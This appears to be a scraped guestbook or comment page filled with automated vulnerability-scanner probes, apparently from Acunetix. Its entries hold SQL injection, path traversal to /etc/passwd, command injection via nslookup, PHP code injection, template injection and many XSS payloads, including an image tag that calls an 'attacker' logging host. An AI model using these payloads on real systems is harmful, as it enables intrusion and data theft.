GRLpGpAG [116.113.93.82] 2020-10-28 19:00:14

../../../../../../../../../../etc/passwd.jpg

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 19:00:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:14

1 waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:13

1

GRLpGpAG [] 2020-10-28 19:00:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:13

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 19:00:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:12

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 19:00:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:12

-1); waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:12

1

create [116.113.93.82] 2020-10-28 19:00:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:11

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:11

1

GRLpGpAG [] 2020-10-28 19:00:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:11

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:11

-1; waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:11

${@print(md5(acunetix_wvs_security_test))}\

create [116.113.93.82] 2020-10-28 19:00:11

1

GRLpGpAG [JyI=] 2020-10-28 19:00:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:10

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:10

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:10

${@print(md5(acunetix_wvs_security_test))}

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:10

create/.

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:10

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 19:00:10

1

GRLpGpAG [@@QMkfr] 2020-10-28 19:00:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:09

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:09

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 19:00:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:09

create

GRLpGpAG [1] 2020-10-28 19:00:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:08

';print(md5(acunetix_wvs_security_test));$a='

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 19:00:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:08

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

GRLpGpAG [\] 2020-10-28 19:00:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:08

create

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:08

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:07

testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [1'"] 2020-10-28 19:00:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:07

if(now()=sysdate(),sleep(9),0)

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:06

HttP://testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:06

1

http://hit5mwsCFK2KY.bxss.me/ [116.113.93.82] 2020-10-28 19:00:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:06

-1" OR 2+578-578-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:04

-1' OR 2+62-62-1=0+0+0+1 or 'EPmqUk5H'='

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:04

http://hit1XIJkbOShv.bxss.me/

testasp.vulnweb.com [116.113.93.82] 2020-10-28 19:00:04

1

GRLpGpAG [create/.] 2020-10-28 19:00:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:03

-1' OR 2+728-728-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:03

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 19:00:03

1

GRLpGpAG [create] 2020-10-28 19:00:02

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 19:00:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:02

-1 OR 2+627-627-1=0+0+0+1

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 19:00:01

1

GRLpGpAG [create] 2020-10-28 19:00:01

1

GRLpGpAG [http://hitYlqxAggd5v.bxss.me/] 2020-10-28 19:00:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:01

-1 OR 2+378-378-1=0+0+0+1 --

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 19:00:01

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 19:00:00

1

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 19:00:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:00:00

9G9BP8Dp

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 19:00:00

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 18:59:59

1

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 18:59:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:59

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 18:59:59

1

!(()&&!|*|*| [116.113.93.82] 2020-10-28 18:59:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:58

testasp.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:58

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 18:59:58

1

) [116.113.93.82] 2020-10-28 18:59:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:58

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 18:59:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:56

^(#$!@#$)(()))******

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:56

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:56

1

'"() [116.113.93.82] 2020-10-28 18:59:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:55

!(()&&!|*|*|

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:55

1some_inexistent_file_with_long_name.jpg

Array [116.113.93.82] 2020-10-28 18:59:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:54

)

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:54

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:54

'"()

GRLpGpAG&n996133=v997088 [116.113.93.82] 2020-10-28 18:59:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:52

Array

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:50

1&n965395=v926384

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 18:59:49

1

GRLpGpAG ['"()] 2020-10-28 18:59:49

1

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 18:59:49

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 18:59:49

1

GRLpGpAG [Array] 2020-10-28 18:59:48

1

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 18:59:48

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 18:59:48

1

Array [116.113.93.82] 2020-10-28 18:59:48

1

GRLpGpAG [)] 2020-10-28 18:59:48

1

GRLpGpAG [116.113.93.82&n941006=v917567] 2020-10-28 18:59:47

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 18:59:47

1

Array [116.113.93.82] 2020-10-28 18:59:47

1

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 18:59:47

1

RXRRZEcxVU4= [116.113.93.82] 2020-10-28 18:59:47

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 18:59:46

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 18:59:46

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 18:59:46

1

GRLpGpAG [file:///etc/passwd] 2020-10-28 18:59:45

1

Зочин [116.113.93.82] 2020-10-28 18:59:45

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 18:59:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:44

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 18:59:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:44

Array

GRLpGpAG [..] 2020-10-28 18:59:43

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 18:59:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:42

Array

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 18:59:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:42

1

${9999915+9999811} [116.113.93.82] 2020-10-28 18:59:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:41

12345'"\'\");|]*{ <>

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:41

${9999652+10000345}

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:41

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 18:59:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:40

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 18:59:40

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 18:59:40

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 18:59:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:39

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [${9999777+9999420}] 2020-10-28 18:59:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:38

1

GRLpGpAG [/etc/passwd] 2020-10-28 18:59:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:38

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 18:59:37

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 18:59:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:37

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 18:59:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:36

1

GRLpGpAG [6qlIoQky'));select pg_sleep(9); -- ] 2020-10-28 18:59:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:36

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 18:59:35

1

GRLpGpAG [osiMqht4');select pg_sleep(9); -- ] 2020-10-28 18:59:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:35

1

GRLpGpAG [Array] 2020-10-28 18:59:35

1

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 18:59:34

1

GRLpGpAG [pVW72YvJ';select pg_sleep(9); -- ] 2020-10-28 18:59:34

1

GRLpGpAG [Array] 2020-10-28 18:59:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:34

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 18:59:33

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 18:59:32

1

GRLpGpAG [PKzrxEFK'; waitfor delay '0:0:6' -- ] 2020-10-28 18:59:32

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 18:59:32

1

GRLpGpAG [1 waitfor delay '0:0:6' -- ] 2020-10-28 18:59:31

1

GRLpGpAG [] 2020-10-28 18:59:31

1

&nslookup u6FGePRG&'\"`0&nslookup u6FGePRG&`' [116.113.93.82] 2020-10-28 18:59:31

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 18:59:31

1

GRLpGpAG [(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/] 2020-10-28 18:59:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:30

1

$(nslookup b5dQ0OpF) [116.113.93.82] 2020-10-28 18:59:29

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 18:59:29

1

"+response.write(9475950*9898609)+" [116.113.93.82] 2020-10-28 18:59:29

1

set|set&set [116.113.93.82] 2020-10-28 18:59:29

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 18:59:28

1

'+response.write(9475950*9898609)+' [116.113.93.82] 2020-10-28 18:59:28

1

YIvYsbye [116.113.93.82] 2020-10-28 18:59:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:28

&nslookup mVUFZtpK&'\"`0&nslookup mVUFZtpK&`'

GRLpGpAG [if(now()=sysdate(),sleep(3),0)] 2020-10-28 18:59:27

1

response.write(9475950*9898609) [116.113.93.82] 2020-10-28 18:59:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:27

JoWDcJtE

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:27

$(nslookup XGKalfYO)

GRLpGpAG [-1" OR 2+937-937-1=0+0+0+1 -- ] 2020-10-28 18:59:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:26

"+response.write(9702768*9646051)+"

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:26

set|set&set

GRLpGpAG [-1' OR 2+695-695-1=0+0+0+1 or '0ZarkKYi'='] 2020-10-28 18:59:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:25

'+response.write(9702768*9646051)+'

GRLpGpAG [p23bmQF3] 2020-10-28 18:59:25

1

GRLpGpAG [-1' OR 2+468-468-1=0+0+0+1 -- ] 2020-10-28 18:59:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:24

response.write(9702768*9646051)

GRLpGpAG [-1 OR 2+957-957-1=0+0+0+1] 2020-10-28 18:59:23

1

GRLpGpAG [&nslookup t6B8KWxC&'\"`0&nslookup t6B8KWxC&`'] 2020-10-28 18:59:21

1

GRLpGpAG [-1 OR 2+997-997-1=0+0+0+1 -- ] 2020-10-28 18:59:21

1

GRLpGpAG [$(nslookup EKdAtOAN)] 2020-10-28 18:59:21

1

GRLpGpAG [set|set&set] 2020-10-28 18:59:20

1

GRLpGpAG [HNw3xaz8] 2020-10-28 18:59:19

1

GRLpGpAG ["+response.write(9868096*9943829)+"] 2020-10-28 18:59:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:18

1

GRLpGpAG ['+response.write(9868096*9943829)+'] 2020-10-28 18:59:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:59:18

1

GRLpGpAG [response.write(9868096*9943829)] 2020-10-28 18:59:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:51:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:41

1

GRLpGpAG"><script>jcLq(9881)</script> [116.113.93.82] 2020-10-28 15:24:33

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(jcLq(9878))'bad=" [116.113.93.82] 2020-10-28 15:24:29

1

[116.113.93.82] 2020-10-28 15:24:27

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%6A%63%4C%71%28%39%39%37%36%29%22 [116.113.93.82] 2020-10-28 15:24:22

1

GRLpGpAG\u0022onmouseover=jcLq(9121)\u0022 [116.113.93.82] 2020-10-28 15:24:08

1

GRLpGpAG" 7jfq=jcLq([!+!]) U0S=" [116.113.93.82] 2020-10-28 15:24:04

1

GRLpGpAG"onmouseover=jcLq(9466)" [116.113.93.82] 2020-10-28 15:23:55

1

GRLpGpAG<SmUhYV< [116.113.93.82] 2020-10-28 15:23:52

1

GRLpGpAG<img sRc='http://attacker-9545/log.php? [116.113.93.82] 2020-10-28 15:23:34

1

GRLpGpAG<jTfDzc x=9618> [116.113.93.82] 2020-10-28 15:23:26

1

GRLpGpAG<ifRAme sRc=9361.com></IfRamE> [116.113.93.82] 2020-10-28 15:23:19

1

GRLpGpAG<WFHQUA>ICEV2[!+!]</WFHQUA> [116.113.93.82] 2020-10-28 15:23:16

1

GRLpGpAG4w0Fa <ScRiPt >jcLq(9080)</ScRiPt> [116.113.93.82] 2020-10-28 15:23:04

1

GRLpGpAG<% contenteditable onresize=jcLq(9943)> [116.113.93.82] 2020-10-28 15:22:58

1

GRLpGpAG}body{acu:Expre/**/SSion(jcLq(9756))} [116.113.93.82] 2020-10-28 15:22:51

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9052);//><!-- --> [116.113.93.82] 2020-10-28 15:22:46

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 15:22:43

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 15:22:34

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 15:22:31

1

GRLpGpAG<input autofocus onfocus=jcLq(9667)> [116.113.93.82] 2020-10-28 15:22:28

1

[116.113.93.82] 2020-10-28 15:22:23

1

GRLpGpAG<ScRiPt>jcLq(9122)</sCripT> [116.113.93.82] 2020-10-28 15:22:20

1

GRLpGpAG\u003CScRiPt\jcLq(9801)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 15:22:17

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%6A%63%4C%71%289784%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 15:22:14

1

GRLpGpAG<img/src=">" onerror=alert(9250)> [116.113.93.82] 2020-10-28 15:22:10

1

GRLpGpAG<img src=xyz OnErRor=jcLq(9841)> [116.113.93.82] 2020-10-28 15:22:03

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=jcLq(9058)> [116.113.93.82] 2020-10-28 15:21:59

1

GRLpGpAG<body onload=jcLq(9085)> [116.113.93.82] 2020-10-28 15:21:51

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9994'> [116.113.93.82] 2020-10-28 15:21:39

1

GRLpGpAG<isindex type=image src=1 onerror=jcLq(9729)> [116.113.93.82] 2020-10-28 15:21:35

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 15:21:25

1

GRLpGpAG<video><source onerror="javascript:jcLq(9196)"> [116.113.93.82] 2020-10-28 15:20:40

1

GRLpGpAG<ScRiPt >jcLq(9332)</ScRiPt> [116.113.93.82] 2020-10-28 15:20:32

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9076></ScRiPt> [116.113.93.82] 2020-10-28 15:20:29

1

GRLpGpAG<ScRiPt >jcLq(9614)</ScRiPt> [116.113.93.82] 2020-10-28 15:20:12

1

GRLpGpAG<ScR<ScRiPt>IpT>jcLq(9674)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 15:20:00

1

GRLpGpAG<script>jcLq(9960)</script> [116.113.93.82] 2020-10-28 15:19:57

1

GRLpGpAG<WYRGJJ>URCWH[!+!]</WYRGJJ> [116.113.93.82] 2020-10-28 15:19:54

1

GRLpGpAG<ScRiPt >jcLq(9237)</ScRiPt> [116.113.93.82] 2020-10-28 15:19:51

1

{{9999897*10000230}} [116.113.93.82] 2020-10-28 15:19:48

1

acux7804 [116.113.93.82] 2020-10-28 15:19:42

1

acu7100<s1﹥s2ʺs3ʹuca7100 [116.113.93.82] 2020-10-28 15:19:36

1

{{10000218*9999309}} [116.113.93.82] 2020-10-28 15:19:19

1

acux2408 [116.113.93.82] 2020-10-28 15:19:09

1

acu7070<s1﹥s2ʺs3ʹuca7070 [116.113.93.82] 2020-10-28 15:19:06

1

GRLpGpAG9435148 [116.113.93.82] 2020-10-28 15:18:57

1

'"()&%<acx><ScRiPt >jcLq(9230)</ScRiPt> [116.113.93.82] 2020-10-28 15:18:54

1

GRLpGpAG'"()&%<acx><ScRiPt >jcLq(9876)</ScRiPt> [116.113.93.82] 2020-10-28 15:18:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:40

1<iscJ55<

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:37

1<img sRc='http://attacker-9283/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:30

1<nkGJyv x=9538>

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:22

1<ifRAme sRc=9219.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:16

1<WKIAF4>KK18L[!+!]</WKIAF4>

GRLpGpAG [116.113.93.82] 2020-10-28 15:18:04

12hEnz <ScRiPt >jcLq(9781)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:57

1<% contenteditable onresize=jcLq(9170)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:53

1}body{acu:Expre/**/SSion(jcLq(9053))}

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:50

1<img<!-- --> src=x onerror=alert(9713);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:43

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:40

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:37

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:34

1<input autofocus onfocus=jcLq(9849)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:31

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:28

1<ScRiPt>jcLq(9058)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:24

1\u003CScRiPt\jcLq(9199)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:18

%31%3C%53%63%52%69%50%74%20%3E%6A%63%4C%71%289803%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:14

1<img/src=">" onerror=alert(9002)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:10

1<img src=xyz OnErRor=jcLq(9924)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:17:04

1<img src=//testasp.vulnweb.com/t/dot.gif onload=jcLq(9424)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:54

1<body onload=jcLq(9403)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:47

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9881'>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:37

1<isindex type=image src=1 onerror=jcLq(9931)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:34

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:29

1<video><source onerror="javascript:jcLq(9144)">

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:26

1<ScRiPt >jcLq(9463)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:23

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9565></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:20

1<ScRiPt >jcLq(9795)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:13

1<ScR<ScRiPt>IpT>jcLq(9753)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:10

1<script>jcLq(9969)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:04

1<WSHMJJ>QY4XY[!+!]</WSHMJJ>

GRLpGpAG [116.113.93.82] 2020-10-28 15:16:02

1<ScRiPt >jcLq(9385)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:15:56

{{10000166*9999846}}

GRLpGpAG [116.113.93.82] 2020-10-28 15:15:49

acux8663

GRLpGpAG [116.113.93.82] 2020-10-28 15:15:46

acu2713<s1﹥s2ʺs3ʹuca2713

GRLpGpAG [116.113.93.82] 2020-10-28 15:15:37

19219258

GRLpGpAG [116.113.93.82] 2020-10-28 15:15:33

'"()&%<acx><ScRiPt >jcLq(9538)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:15:19

1'"()&%<acx><ScRiPt >jcLq(9391)</ScRiPt>

GRLpGpAG [116.113.93.82<Zdzdwi<] 2020-10-28 15:15:08

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9826/log.php?] 2020-10-28 15:14:51

1

GRLpGpAG [116.113.93.82<7HLwth x=9364>] 2020-10-28 15:14:48

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9648.com></IfRamE>] 2020-10-28 15:14:42

1

GRLpGpAG [116.113.93.82<W6LDQ5>OBEIA[!+!]</W6LDQ5>] 2020-10-28 15:14:38

1

GRLpGpAG [116.113.93.82gEh2n <ScRiPt >jcLq(9840)</ScRiPt>] 2020-10-28 15:14:35

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=jcLq(9805)>] 2020-10-28 15:14:11

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(jcLq(9513))}] 2020-10-28 15:14:08

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9631);//><!-- -->] 2020-10-28 15:13:57

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 15:13:54

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 15:13:38

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 15:13:35

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=jcLq(9750)>] 2020-10-28 15:13:32

1

GRLpGpAG [] 2020-10-28 15:13:29

1

GRLpGpAG [116.113.93.82<ScRiPt>jcLq(9046)</sCripT>] 2020-10-28 15:13:25

1

GRLpGpAG [116.113.93.82\u003CScRiPt\jcLq(9189)\u003C/sCripT\u003E] 2020-10-28 15:13:22

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%6A%63%4C%71%289059%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 15:13:19

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9799)>] 2020-10-28 15:13:12

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=jcLq(9706)>] 2020-10-28 15:12:56

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=jcLq(9208)>] 2020-10-28 15:12:53

1

GRLpGpAG [116.113.93.82<body onload=jcLq(9266)>] 2020-10-28 15:12:50

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9104'>] 2020-10-28 15:12:46

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=jcLq(9958)>] 2020-10-28 15:12:36

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 15:12:17

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:jcLq(9417)">] 2020-10-28 15:12:10

1

GRLpGpAG [116.113.93.82<ScRiPt >jcLq(9416)</ScRiPt>] 2020-10-28 15:12:06

1

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9560></ScRiPt>] 2020-10-28 15:11:56

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 15:11:55

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 15:11:53

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 15:11:51

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 15:11:49

1

